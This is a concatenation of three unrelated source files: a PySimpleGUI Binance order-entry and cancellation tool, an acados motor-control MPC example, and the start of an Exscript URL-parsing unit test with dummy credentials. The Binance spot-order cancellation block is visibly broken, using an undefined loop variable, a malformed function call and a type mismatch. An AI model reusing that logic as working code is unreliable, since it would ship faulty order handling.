if sg.popup_yes_no('CONFIRM?', text_color='yellow', background_color='red') == 'No':
BU.errPrint(f'{windowTitle} - CANCELLED!')
continue
ret, msgRet = BO.orderSpot(client,
symbOrd = valuesSM['-SYMBOL-'],
qtdOrd = valuesSM['-QTD-'],
sideOrd = clientSide,
typeOrd = Client.ORDER_TYPE_MARKET)
if ret == False:
sg.popup('ERRO! Order didnt post!')
windowSM.close()
del windowSM
del layoutSM
return False, f"Erro posting order! {msgRet}"
if valuesSM['CB_COPYTRADE'] == True and COPYTRADE_IsEnable() == True:
print("Call COPYTRADE...")
BU.errPrint(f'{windowTitle} - CONFIRMED!')
elif eventSM == sg.WIN_CLOSED or eventSM == 'CANCEL':
BU.errPrint(f'{windowTitle} - CANCELLED!')
break
windowSM.close()
del windowSM
del layoutSM
return True, "Ok"
def BS_SpotLimit(client, bgcolor = '', windowTitle = '', clientSide = 0)->[bool, str]:
layoutSL = [
[sg.Text('Symbol: ', background_color = bgcolor), sg.InputText(key = '-SYMBOL-')],
[sg.Text('Qtd: ', background_color = bgcolor), sg.InputText(key = '-QTD-')],
[sg.Text('Price: ', background_color = bgcolor), sg.InputText(key = '-PRICE-')],
[sg.Checkbox('send to CopyTrade', key='CB_COPYTRADE', disabled=False)],
[sg.Button('SEND!'), sg.Button('CANCEL')],
]
windowSL = sg.Window(windowTitle, layoutSL, background_color = bgcolor).Finalize()
while True:
eventSL, valuesSL = windowSL.read()
if eventSL == 'SEND!':
BU.errPrint(f"{windowTitle} - Order Symbol: [{valuesSL['-SYMBOL-']}] Qtd: [{valuesSL['-QTD-']}] Price: [{valuesSL['-PRICE-']}]")
if sg.popup_yes_no('CONFIRM?', text_color='yellow', background_color='red') == 'No':
BU.errPrint(f'{windowTitle} - CANCELLED!')
continue
ret, msgRet = BO.orderSpot(client,
symbOrd = valuesSL['-SYMBOL-'],
qtdOrd = valuesSL['-QTD-'],
prcOrd = valuesSL['-PRICE-'],
sideOrd = clientSide,
typeOrd = Client.ORDER_TYPE_LIMIT)
if ret == False:
sg.popup('ERRO! Order didnt post!')
windowSL.close()
del windowSL
del layoutSL
return False, f"Erro posting order! {msgRet}"
if valuesSL['CB_COPYTRADE'] == True and COPYTRADE_IsEnable() == True:
print("Call COPYTRADE...")
BU.errPrint(f'{windowTitle} - CONFIRMED!')
elif eventSL == sg.WIN_CLOSED or eventSL == 'CANCEL':
BU.errPrint(f'{windowTitle} - CANCELLED!')
break
windowSL.close()
del windowSL
del layoutSL
return True, "Ok"
def ListOpenOrders(client)->[bool, str]:
def buildOrderList(ordList):
return [sg.CBox(f"{ordList['orderId']}", key=f"{ordList['orderId']}"),
sg.Text(f"{ordList['symbol']}\t\t{ordList['side']}\t\t{ordList['price']}\t\t{ordList['origQty']}\t\t{ordList['type']}", font=("Courier", 10))]
try:
openOrders = client.get_open_orders() #recvWindow
openMarginOrders = client.get_open_margin_orders() #recvWindow
except BinanceRequestException as e:
return False, f"Erro at client.get_open_orders() BinanceRequestException: [{e.status_code} - {e.message}]"
except BinanceAPIException as e:
return False, f"Erro at client.get_open_orders() BinanceAPIException: [{e.status_code} - {e.message}]"
except Exception as e:
return False, f"Erro at client.get_open_orders(): {e}"
if len(openOrders) == 0:
layoutFrameSpotOpen = [[sg.Text("0 orders.", font=("Courier", 10))]]
else:
layoutFrameSpotOpen = [[sg.Text("Order Id\tSymbol\tSide\tPrice\tQtd\tType", font=("Courier", 10))]]
[layoutFrameSpotOpen.append(buildOrderList(i)) for i in openOrders]
layoutFrameSpotOpen.append([sg.Button('Delete Spot Order'), sg.Button('Copy Spot data to clipboard'), sg.Button('CopyTrade')])
if len(openMarginOrders) == 0:
layoutFrameMarginOpen = [[sg.Text("0 orders.", font=("Courier", 10))]]
else:
layoutFrameMarginOpen = [[sg.Text("Order Id\tSymbol\tSide\tPrice\tQtd\tType", font=("Courier", 10))]]
[layoutFrameMarginOpen.append(buildOrderList(i)) for i in openMarginOrders]
layoutFrameMarginOpen.append([sg.Button('Delete Margin Order'), sg.Button('Copy Margin data to clipboard'), sg.Button('CopyTrade')])
layoutListOpenOrders = [
[sg.Frame('SPOT', layoutFrameSpotOpen, title_color='blue')],
[sg.Frame('MARGIN', layoutFrameMarginOpen, title_color='blue')],
[sg.Button('Close')]
]
windowListOpenOrder = sg.Window('Open Orders', layoutListOpenOrders);
eventLOO, valuesLOO = windowListOpenOrder.read()
del layoutFrameSpotOpen
del layoutFrameMarginOpen
if eventLOO == sg.WIN_CLOSED or eventLOO == 'Close':
pass
elif eventLOO == 'Delete Margin Order':
BU.errPrint("Deleting margin orders:")
for i in [str(k) for k, v in valuesLOO.items() if v == True]:
for j2 in openMarginOrders:
if j2['orderId'] == int(i):
ret, msgRet = BO.cancel_a_margin_order(client, symbOrd = j2['symbol'], ordrid = j2['orderId'])
if ret == False:
BU.errPrint(f"Erro canceling MARGIN order {j2['orderId']}! {msgRet}")
windowListOpenOrder.close()
del openOrders
del openMarginOrders
del windowListOpenOrder
del layoutListOpenOrders
return False, f"Erro canceling MARGIN order {j2['orderId']}! {msgRet}"
elif eventLOO == 'Copy Margin data to clipboard':
pass
elif eventLOO == 'CopyTrade':
pass
elif eventLOO == 'Delete Spot Order':
BU.errPrint("Deleting spot orders:")
for i in [str(k) for k, v in valuesLOO.items() if v == True]:
for j1 in openOrders:
if j1['orderId'] == i:
ret, msgRet = cancel_a_BO.spot_order(client, symbOrd = j2['symbol'], ordrid = j2['orderId'])
if ret == False:
BU.errPrint(f"Erro canceling SPOT order {j1['orderId']}! {msgRet}")
windowListOpenOrder.close()
del openOrders
del openMarginOrders
del windowListOpenOrder
del layoutListOpenOrders
return False, f"Erro canceling SPOT order {j1['orderId']}! {msgRet}"
elif eventLOO == 'Copy Spot data to clipboard':
pass
elif eventLOO == 'CopyTrade':
pass
windowListOpenOrder.close()
del openOrders
del openMarginOrders
del windowListOpenOrder
del layoutListOpenOrders
return True, 'Ok'
def main(argv):
STATUSBAR_WRAP = 100
global cfgbnb
cfgbnb.load()
binanceAPIKey = cfgbnb.get('BINANCE_APIKEY')
if cfgbnb.get('BINANCE_APIKEY') == '':
binanceAPIKey = getenv("BINANCE_APIKEY", "NOTDEF_APIKEY")
if binanceAPIKey == "NOTDEF_APIKEY":
BU.nmExitErro("Environment variable BINANCE_APIKEY not defined!")
binanceSEKKey = cfgbnb.get('BINANCE_SEKKEY')
if cfgbnb.get('BINANCE_SEKKEY') == '':
binanceSEKKey = getenv("BINANCE_SEKKEY", "NOTDEF_APIKEY")
if binanceSEKKey == "NOTDEF_APIKEY":
BU.nmExitErro("Environment variable BINANCE_SEKKEY not defined!")
if cfgbnb.get('BINANCE_RECVWINDOW') == '':
binanceRecvWindow = int(getenv("BINANCE_RECVWINDOW", 5000))
menu = [
[ '&Menu', ['Info', 'Config', '---', 'Read cfg', 'Write cfg', 'Create Empty Cfg file', '---', 'Exit']],
[ '&Account', ['Infos acc', 'Taxes']],
[ '&Order', ['BUY', ['B Spot Market', 'B Spot Limit','B Spot Stop Limit', '!B Spot OCO', '---', 'B Margin Market', 'B Margin Limit', 'B Margin Stop Limit', '!B Margin OCO'],
'SELL', ['S Spot Market', 'S Spot Limit','S Spot Stop Limit', '!S Spot OCO', '---', 'S Margin Market', 'S Margin Limit', 'S Margin Stop Limit', '!S Margin OCO'], '!CANCEL', 'LIST or DELETE Open', '!LIST All']],
[ '&Binance', ['Infos binance', 'Assets', 'Symbols']]
]
layout = [
[sg.Menu(menu)],
[sg.Button('Spot Market' , key='BTTN_BSM' , button_color=('black','green'), size=(30,1)), sg.Button('Spot Market' , key='BTTN_SSM' , button_color=('black', 'red'), size=(30,1))],
[sg.Button('Spot Limit' , key='BTTN_BSL' , button_color=('black','green'), size=(30,1)), sg.Button('Spot Limit' , key='BTTN_SSL' , button_color=('black','red'), size=(30,1))],
[sg.Button('Spot Stop Limit' , key='BTTN_BSSL', button_color=('black','green'), size=(30,1)), sg.Button('Spot Stop Limit' , key='BTTN_SSSL', button_color=('black','red'), size=(30,1))],
[sg.Button('Spot OCO' , disabled=True, key='BTTN_BSO' , button_color=('black','green'), size=(30,1)), sg.Button('Spot OCO' , disabled=True, key='BTTN_SSO' , button_color=('black','red'), size=(30,1))],
[sg.Button('Margin Market' , key='BTTN_BMM' , button_color=('black','green'), size=(30,1)), sg.Button('Margin Market' , key='BTTN_SMM' , button_color=('black','red'), size=(30,1))],
[sg.Button('Margin Limit' , key='BTTN_BML' , button_color=('black','green'), size=(30,1)), sg.Button('Margin Limit' , key='BTTN_SML' , button_color=('black','red'), size=(30,1))],
[sg.Button('Margin Stop Limit', key='BTTN_BMSL', button_color=('black','green'), size=(30,1)), sg.Button('Margin Stop Limit', key='BTTN_SMSL', button_color=('black','red'), size=(30,1))],
[sg.Button('Margin OCO' , disabled=True, key='<KEY>' , button_color=('black','green'), size=(30,1)), sg.Button('Margin OCO' , disabled=True, key='BTTN_SMO' , button_color=('black','red'), size=(30,1))],
[sg.Button('LIST or DELETE Open', key='BTTN_LDOO')],
[sg.Button('CLOSE', key='BTTN_CLOSE')],
[sg.StatusBar('Last msg: Initialized', key='LASTMSG', size=(250, 3), justification='left')],
]
BU.setConfirmationYES(True)
# CONNECTING TO BINANCE
try:
client = Client(binanceAPIKey, binanceSEKKey, {"verify": True, "timeout": 20})
except BinanceAPIException as e:
BU.nmExitErro(f"Binance API exception: [{e.status_code} - {e.message}]")
except BinanceRequestException as e:
BU.nmExitErro(f"Binance request exception: [{e.status_code} - {e.message}]")
except BinanceWithdrawException as e:
BU.nmExitErro(f"Binance withdraw exception: [{e.status_code} - {e.message}]")
except Exception as e:
BU.nmExitErro(f"Binance connection error: {e}")
sg.theme(cfgbnb.get('THEME'))
#sg.set_options(suppress_raise_key_errors=False, suppress_error_popups=False, suppress_key_guessing=False)
window = sg.Window('Binance Status GUI', layout, size = (600, 400)).Finalize()
while True:
event, values = window.read() #timeout=1000)
if event == sg.WIN_CLOSED or event == 'Exit' or event == 'BTTN_CLOSE':
break
elif event == "Infos":
sg.popup('INFOS')
elif event == 'Info':
pass
elif event == 'Config':
pass
elif event == 'Infos acc':
window.Hide()
ret, msgRet = printAccountInfo(client)
window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
window.UnHide()
elif event == 'Taxes':
pass
elif event == 'B Spot Market' or event == 'BTTN_BSM':
window.Hide()
ret, msgRet = BS_SpotMarket(client, 'green', 'Buy Spot Market', Client.SIDE_BUY)
window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
window.UnHide()
elif event == 'B Spot Limit' or event == 'BTTN_BSL':
window.Hide()
ret, msgRet = BS_SpotLimit(client, 'green', 'Buy Spot Limit', Client.SIDE_BUY)
window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
window.UnHide()
elif event == 'B Spot Stop Limit' or event == 'BTTN_BSSL':
window.Hide()
ret, msgRet = BS_SpotStopLimit(client, 'green', 'Buy Spot Stop Limit', Client.SIDE_BUY)
window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
window.UnHide()
elif event == 'B Spot OCO' or event == 'BTTN_BSO':
pass
elif event == 'B Margin Market' or event == 'BTTN_BMM':
window.Hide()
ret, msgRet = BS_MarginMarket(client, 'red', 'Sell Margin Limit', Client.SIDE_SELL)
window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
window.UnHide()
elif event == 'B Margin Limit' or event == 'BTTN_BML':
window.Hide()
ret, msgRet = BS_MarginLimit(client, 'green', 'Buy Margin Limit', Client.SIDE_BUY)
window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
window.UnHide()
elif event == 'B Margin Stop Limit' or event == 'BTTN_BMSL':
window.Hide()
ret, retMsg = BS_MarginStopLimit(client, 'green', 'Buy Margin Stop Limit', Client.SIDE_BUY)
window['LASTMSG'].update(fill(f'Last operation returned: {retMsg}', STATUSBAR_WRAP))
window.UnHide()
elif event == 'B Margin OCO' or event == 'BTTN_BMO':
pass
elif event == 'S Spot Market' or event == 'BTTN_SSM':
window.Hide()
ret, msgRet = BS_SpotMarket(client, 'red', 'Sell Spot Market', Client.SIDE_SELL)
window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
window.UnHide()
elif event == 'S Spot Limit' or event == 'BTTN_SSL':
window.Hide()
ret, retMsg = BS_SpotLimit(client, 'red', 'Sell Spot Limit', Client.SIDE_SELL)
window['LASTMSG'].update(fill(f'Last operation returned: {retMsg}', STATUSBAR_WRAP))
window.UnHide()
elif event == 'S Spot Stop Limit' or event == 'BTTN_SSSL':
window.Hide()
ret, retMsg = BS_SpotStopLimit(client, 'red', 'Sell Spot Stop Limit', Client.SIDE_SELL)
window['LASTMSG'].update(fill(f'Last operation returned: {retMsg}', STATUSBAR_WRAP))
window.UnHide()
elif event == 'S Spot OCO' or event == 'BTTN_SSO':
pass
elif event == 'S Margin Market' or event == 'BTTN_SMM':
window.Hide()
ret, retMsg = BS_MarginMarket(client, 'red', 'Sell Margin Limit', Client.SIDE_SELL)
window['LASTMSG'].update(fill(f'Last operation returned: {retMsg}', STATUSBAR_WRAP))
window.UnHide()
elif event == 'S Margin Limit' or event == 'BTTN_SML':
window.Hide()
ret, retMsg = BS_MarginLimit(client, 'red', 'Sell Margin Limit', Client.SIDE_SELL)
window['LASTMSG'].update(fill(f'Last operation returned: {retMsg}', STATUSBAR_WRAP))
window.UnHide()
elif event == 'S Margin Stop Limit' or event == 'BTTN_SMSL':
window.Hide()
ret, msgRet = BS_MarginStopLimit(client, 'red', 'Sell Margin Stop Limit', Client.SIDE_SELL)
window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
window.UnHide()
elif event == 'S Margin OCO' or event == 'BTTN_SMO':
pass
elif event == 'CANCEL':
pass
elif event == 'LIST or DELETE Open' or event == 'BTTN_LDOO':
window.Hide()
ret, msgRet = ListOpenOrders(client)
window['LASTMSG'].update(fill(f'Last operation returned: {msgRet}', STATUSBAR_WRAP))
window.UnHide()
elif event == 'LIST All':
pass
elif event == 'Infos binance':
pass
elif event == 'Assets':
pass
elif event == 'Symbols':
pass
window.close()
if __name__ == '__main__':
main(argv)
exit(0)
|
#
# Copyright 2019 <NAME>, <NAME>, <NAME>,
# <NAME>, <NAME>, <NAME>, <NAME>,
# <NAME>, <NAME>, <NAME>, <NAME>,
# <NAME>, <NAME>, <NAME>, <NAME>, <NAME>
#
# This file is part of acados.
#
# The 2-Clause BSD License
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.;
#
from acados_template import *
import acados_template as at
import numpy as nmp
from ctypes import *
import matplotlib
import matplotlib.pyplot as plt
import scipy.linalg
import json
CODE_GEN = 1
COMPILE = 1
FORMULATION = 2 # 0 for hexagon 1 for sphere 2 SCQP sphere
i_d_ref = 1.484
i_q_ref = 1.429
w_val = 200
i_d_ref = -20
i_q_ref = 20
w_val = 300
udc = 580
u_max = 2/3*udc
# fitted psi_d map
def psi_d_num(x,y):
# This function was generated by the Symbolic Math Toolbox version 8.0.
# 07-Feb-2018 23:07:49
psi_d_expression = x*(-4.215858085639979e-3) + \
exp(y**2*(-8.413493151721978e-5))*atan(x*1.416834085282644e-1)*8.834738694115108e-1
return psi_d_expression
def psi_q_num(x,y):
# This function was generated by the Symbolic Math Toolbox version 8.0.
# 07-Feb-2018 23:07:50
psi_q_expression = y*1.04488335702649e-2+exp(x**2*(-1.0/7.2e1))*atan(y)*6.649036351062812e-2
return psi_q_expression
psi_d_ref = psi_d_num(i_d_ref, i_q_ref)
psi_q_ref = psi_q_num(i_d_ref, i_q_ref)
# compute steady-state u
Rs = 0.4
u_d_ref = Rs*i_d_ref - w_val*psi_q_ref
u_q_ref = Rs*i_q_ref + w_val*psi_d_ref
def export_dae_model():
model_name = 'rsm'
# constants
theta = 0.0352
Rs = 0.4
m_load = 0.0
J = nmp.array([[0, -1], [1, 0]])
# set up states
psi_d = SX.sym('psi_d')
psi_q = SX.sym('psi_q')
x = vertcat(psi_d, psi_q)
# set up controls
u_d = SX.sym('u_d')
u_q = SX.sym('u_q')
u = vertcat(u_d, u_q)
# set up algebraic variables
i_d = SX.sym('i_d')
i_q = SX.sym('i_q')
z = vertcat(i_d, i_q)
# set up xdot
psi_d_dot = SX.sym('psi_d_dot')
psi_q_dot = SX.sym('psi_q_dot')
xdot = vertcat(psi_d_dot, psi_q_dot)
# set up parameters
w = SX.sym('w') # speed
dist_d = SX.sym('dist_d') # d disturbance
dist_q = SX.sym('dist_q') # q disturbance
p = vertcat(w, dist_d, dist_q)
# build flux expression
Psi = vertcat(psi_d_num(i_d, i_q), psi_q_num(i_d, i_q))
# dynamics
f_impl = vertcat( psi_d_dot - u_d + Rs*i_d - w*psi_q - dist_d, \
psi_q_dot - u_q + Rs*i_q + w*psi_d - dist_q, \
psi_d - Psi[0], \
psi_q - Psi[1])
model = acados_dae()
model.f_impl_expr = f_impl
model.f_expl_expr = []
model.x = x
model.xdot = xdot
model.u = u
model.z = z
model.p = p
model.name = model_name
return model
def export_voltage_sphere_con():
con_name = 'v_sphere'
# set up states
psi_d = SX.sym('psi_d')
psi_q = SX.sym('psi_q')
x = vertcat(psi_d, psi_q)
# set up controls
u_d = SX.sym('u_d')
u_q = SX.sym('u_q')
u = vertcat(u_d, u_q)
# voltage sphere
constraint = acados_constraint()
constraint.expr = u_d**2 + u_q**2
# constraint.expr = u_d + u_q
constraint.x = x
constraint.u = u
constraint.nc = 1
constraint.name = con_name
return constraint
def export_nonlinear_part_voltage_constraint():
con_name = 'v_sphere_nl'
# set up states
psi_d = SX.sym('psi_d')
psi_q = SX.sym('psi_q')
x = vertcat(psi_d, psi_q)
# set up controls
u_d = SX.sym('u_d')
u_q = SX.sym('u_q')
u = vertcat(u_d, u_q)
# voltage sphere
constraint = acados_constraint()
constraint.expr = vertcat(u_d, u_q)
# constraint.expr = u_d + u_q
constraint.x = x
constraint.u = u
constraint.nc = 2
constraint.name = con_name
return constraint
def get_general_constraints_DC(u_max):
# polytopic constraint on the input
r = u_max
x1 = r
y1 = 0
x2 = r*cos(pi/3)
y2 = r*sin(pi/3)
q1 = -(y2 - y1/x1*x2)/(1-x2/x1)
m1 = -(y1 + q1)/x1
# q1 <= uq + m1*ud <= -q1
# q1 <= uq - m1*ud <= -q1
# box constraints
m2 = 0
q2 = r*sin(pi/3)
# -q2 <= uq <= q2
# form D and C matrices
# (acados C interface works with column major format)
D = nmp.transpose(nmp.array([[1, m1],[1, -m1]]))
# D = nmp.array([[1, m1],[1, -m1]])
# TODO(andrea): ???
# D = nmp.transpose(nmp.array([[m1, 1],[-m1, 1]]))
D = nmp.array([[m1, 1],[-m1, 1]])
C = nmp.transpose(nmp.array([[0, 0], [0, 0]]))
ug = nmp.array([-q1, -q1])
lg = nmp.array([+q1, +q1])
lbu = nmp.array([-q2])
ubu = nmp.array([+q2])
res = dict()
res["D"] = D
res["C"] = C
res["lg"] = lg
res["ug"] = ug
res["lbu"] = lbu
res["ubu"] = ubu
return res
# create render arguments
ra = acados_ocp_nlp()
# export model
model = export_dae_model()
# export constraint description
constraint = export_voltage_sphere_con()
constraint_nl = export_nonlinear_part_voltage_constraint()
# set model_name
ra.model_name = model.name
if FORMULATION == 1:
# constraints name
ra.con_h_name = constraint.name
if FORMULATION == 2:
# constraints name
ra.con_h_name = constraint.name
ra.con_p_name = constraint_nl.name
# Ts = 0.0016
# Ts = 0.0012
Ts = 0.0008
# Ts = 0.0004
nx = model.x.size()[0]
nu = model.u.size()[0]
nz = model.z.size()[0]
np = model.p.size()[0]
ny = nu + nx
ny_e = nx
N = 2
Tf = N*Ts
# set ocp_nlp_dimensions
nlp_dims = ra.dims
nlp_dims.nx = nx
nlp_dims.nz = nz
nlp_dims.ny = ny
nlp_dims.ny_e = ny_e
nlp_dims.nbx = 0
nlp_dims.nbu = 1
if FORMULATION == 0:
nlp_dims.nbu = 1
nlp_dims.ng = 2
if FORMULATION == 1:
nlp_dims.ng = 0
nlp_dims.nh = 1
if FORMULATION == 2:
nlp_dims.ng = 2
nlp_dims.npd = 2
nlp_dims.nh = 1
nlp_dims.nh_e = 0
# nlp_dims.nbu = 2
# nlp_dims.ng = 2
# nlp_dims.ng = 0
nlp_dims.ng_e = 0
nlp_dims.nbx_e = 0
nlp_dims.nu = nu
nlp_dims.np = np
nlp_dims.N = N
# nlp_dims.npd_e = -1
# nlp_dims.nh = 1
# set weighting matrices
nlp_cost = ra.cost
Q = nmp.eye(nx)
Q[0,0] = 5e2*Tf/N
Q[1,1] = 5e2*Tf/N
R = nmp.eye(nu)
R[0,0] = 1e-4*Tf/N
R[1,1] = 1e-4*Tf/N
# R[0,0] = 1e1
# R[1,1] = 1e1
nlp_cost.W = scipy.linalg.block_diag(Q, R)
Vx = nmp.zeros((ny, nx))
Vx[0,0] = 1.0
Vx[1,1] = 1.0
nlp_cost.Vx = Vx
Vu = nmp.zeros((ny, nu))
Vu[2,0] = 1.0
Vu[3,1] = 1.0
nlp_cost.Vu = Vu
Vz = nmp.zeros((ny, nz))
Vz[0,0] = 0.0
Vz[1,1] = 0.0
nlp_cost.Vz = Vz
Q_e = nmp.eye(nx)
Q_e[0,0] = 1e-3
Q_e[1,1] = 1e-3
nlp_cost.W_e = Q_e
Vx_e = nmp.zeros((ny_e, nx))
Vx_e[0,0] = 1.0
Vx_e[1,1] = 1.0
nlp_cost.Vx_e = Vx_e
nlp_cost.yref = nmp.zeros((ny, ))
nlp_cost.yref[0] = psi_d_ref
nlp_cost.yref[1] = psi_q_ref
nlp_cost.yref[2] = u_d_ref
nlp_cost.yref[3] = u_q_ref
nlp_cost.yref_e = nmp.zeros((ny_e, ))
nlp_cost.yref_e[0] = psi_d_ref
nlp_cost.yref_e[1] = psi_q_ref
# get D and C
res = get_general_constraints_DC(u_max)
D = res["D"]
C = res["C"]
lg = res["lg"]
ug = res["ug"]
lbu = res["lbu"]
ubu = res["ubu"]
# setting bounds
# lbu <= u <= ubu and lbx <= x <= ubx
nlp_con = ra.constraints
# nlp_con.idxbu = nmp.array([0, 1])
# nlp_con.lbu = nmp.array([-u_max, -u_max])
# nlp_con.ubu = nmp.array([+u_max, +u_max])
nlp_con.idxbu = nmp.array([1])
nlp_con.lbu = lbu
nlp_con.ubu = ubu
if FORMULATION > 0:
nlp_con.lh = nmp.array([-1.0e8])
nlp_con.uh = nmp.array([(u_max*sqrt(3)/2)**2])
nlp_con.x0 = nmp.array([0.0, -0.0])
if FORMULATION == 0 or FORMULATION == 2:
# setting general constraints
# lg <= D*u + C*u <= ug
nlp_con.D = D
nlp_con.C = C
nlp_con.lg = lg
nlp_con.ug = ug
# nlp_con.C_e = ...
# nlp_con.lg_e = ...
# nlp_con.ug_e = ...
# setting parameters
nlp_con.p = nmp.array([w_val, 0.0, 0.0])
# set constants
# ra.constants = []
# set QP solver
ra.solver_config.qp_solver = 'PARTIAL_CONDENSING_HPIPM'
# ra.solver_config.qp_solver = 'FULL_CONDENSING_HPIPM'
# ra.solver_config.qp_solver = 'FULL_CONDENSING_QPOASES'
ra.solver_config.hessian_approx = 'GAUSS_NEWTON'
# ra.solver_config.integrator_type = 'ERK'
ra.solver_config.integrator_type = 'IRK'
# set prediction horizon
ra.solver_config.tf = Tf
ra.solver_config.nlp_solver_type = 'SQP_RTI'
# ra.solver_config.nlp_solver_type = 'SQP'
# set header path
ra.acados_include_path = '/usr/local/include'
ra.acados_lib_path = '/usr/local/lib'
file_name = 'acados_ocp.json'
if CODE_GEN == 1:
if FORMULATION == 0:
acados_solver = generate_solver(model, ra, json_file = file_name)
if FORMULATION == 1:
acados_solver = generate_solver(model, ra, con_h=constraint, json_file = file_name)
if FORMULATION == 2:
acados_solver = generate_solver(model, ra, con_h=constraint, con_p=constraint_nl, json_file = file_name)
if COMPILE == 1:
# make
os.chdir('c_generated_code')
os.system('make')
os.system('make shared_lib')
os.chdir('..')
# closed loop simulation TODO(add proper simulation)
Nsim = 100
simX = nmp.ndarray((Nsim, nx))
simU = nmp.ndarray((Nsim, nu))
for i in range(Nsim):
status = acados_solver.solve()
# get solution
x0 = acados_solver.get(0, "x")
u0 = acados_solver.get(0, "u")
for j in range(nx):
simX[i,j] = x0[j]
for j in range(nu):
simU[i,j] = u0[j]
field_name = "u"
# update initial condition
x0 = acados_solver.get(1, "x")
acados_solver.set(0, "lbx", x0)
acados_solver.set(0, "ubx", x0)
# update initial condition
x0 = acados_solver.get(1, "x")
acados_solver.set(0, "lbx", x0)
acados_solver.set(0, "ubx", x0)
# plot results
t = nmp.linspace(0.0, Ts*Nsim, Nsim)
plt.subplot(4, 1, 1)
plt.step(t, simU[:,0], color='r')
plt.plot([0, Ts*Nsim], [nlp_cost.yref[2], nlp_cost.yref[2]], '--')
plt.title('closed-loop simulation')
plt.ylabel('u_d')
plt.xlabel('t')
plt.grid(True)
plt.subplot(4, 1, 2)
plt.step(t, simU[:,1], color='r')
plt.plot([0, Ts*Nsim], [nlp_cost.yref[3], nlp_cost.yref[3]], '--')
plt.ylabel('u_q')
plt.xlabel('t')
plt.grid(True)
plt.subplot(4, 1, 3)
plt.plot(t, simX[:,0])
plt.plot([0, Ts*Nsim], [nlp_cost.yref[0], nlp_cost.yref[0]], '--')
plt.ylabel('psi_d')
plt.xlabel('t')
plt.grid(True)
plt.subplot(4, 1, 4)
plt.plot(t, simX[:,1])
plt.plot([0, Ts*Nsim], [nlp_cost.yref[1], nlp_cost.yref[1]], '--')
plt.ylabel('psi_q')
plt.xlabel('t')
plt.grid(True)
# plot hexagon
r = u_max
x1 = r
y1 = 0
x2 = r*cos(pi/3)
y2 = r*sin(pi/3)
q1 = -(y2 - y1/x1*x2)/(1-x2/x1)
m1 = -(y1 + q1)/x1
# q1 <= uq + m1*ud <= -q1
# q1 <= uq - m1*ud <= -q1
# box constraints
m2 = 0
q2 = r*sin(pi/3)
# -q2 <= uq <= q2
plt.figure()
plt.plot(simU[:,0], simU[:,1], 'o')
plt.xlabel('ud')
plt.ylabel('uq')
ud = nmp.linspace(-1.5*u_max, 1.5*u_max, 100)
plt.plot(ud, -m1*ud -q1)
plt.plot(ud, -m1*ud +q1)
plt.plot(ud, +m1*ud -q1)
plt.plot(ud, +m1*ud +q1)
plt.plot(ud, -q2*nmp.ones((100, 1)))
plt.plot(ud, q2*nmp.ones((100, 1)))
plt.grid(True)
ax = plt.gca()
ax.set_xlim([-1.5*u_max, 1.5*u_max])
ax.set_ylim([-1.5*u_max, 1.5*u_max])
circle = plt.Circle((0, 0), u_max*nmp.sqrt(3)/2, color='red', fill=False)
ax.add_artist(circle)
plt.show()
|
<filename>tests/Exscript/util/urlTest.py
from builtins import str
import sys
import unittest
import re
import os.path
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', '..', '..'))
from Exscript.util.url import Url
urls = [
# No protocol.
('testhost',
'telnet://testhost:23'),
('testhost?myvar=testvalue',
'telnet://testhost:23?myvar=testvalue'),
# No protocol + empty user.
('@testhost',
'telnet://@testhost:23'),
('@testhost?myvar=testvalue',
'telnet://@testhost:23?myvar=testvalue'),
# No protocol + user.
('user@testhost',
'telnet://user@testhost:23'),
('user:password@testhost',
'telnet://user:password@testhost:23'),
('user:password:<PASSWORD>@testhost',
'telnet://user:password:password2@testhost:23'),
# No protocol + empty password 1.
('user:@testhost',
'telnet://user:@testhost:23'),
('user::password2@testhost',
'telnet://user::password2@testhost:23'),
(':@testhost',
'telnet://:@testhost:23'),
# No protocol + empty password 2.
('user:password:@testhost',
'telnet://user:password:@testhost:23'),
('user::@testhost',
'telnet://user::@testhost:23'),
('::@testhost',
'telnet://::@testhost:23'),
(':password:@testhost',
'telnet://:password:@testhost:23'),
# Protocol.
('ssh1://testhost',
'ssh1://testhost:22'),
('ssh1://testhost?myvar=testvalue',
'ssh1://testhost:22?myvar=testvalue'),
# Protocol + empty user.
('ssh://@testhost',
'ssh://@testhost:22'),
('ssh://:password@testhost',
'ssh://:password@testhost:22'),
('ssh://:password:password2@testhost',
'ssh://:password:<PASSWORD>@testhost:22'),
# Protocol + user.
('ssh://user@testhost',
'ssh://user@testhost:22'),
('ssh://user@testhost?myvar=testvalue',
'ssh://user@testhost:22?myvar=testvalue'),
('ssh://user:password@testhost',
'ssh://user:password@testhost:22'),
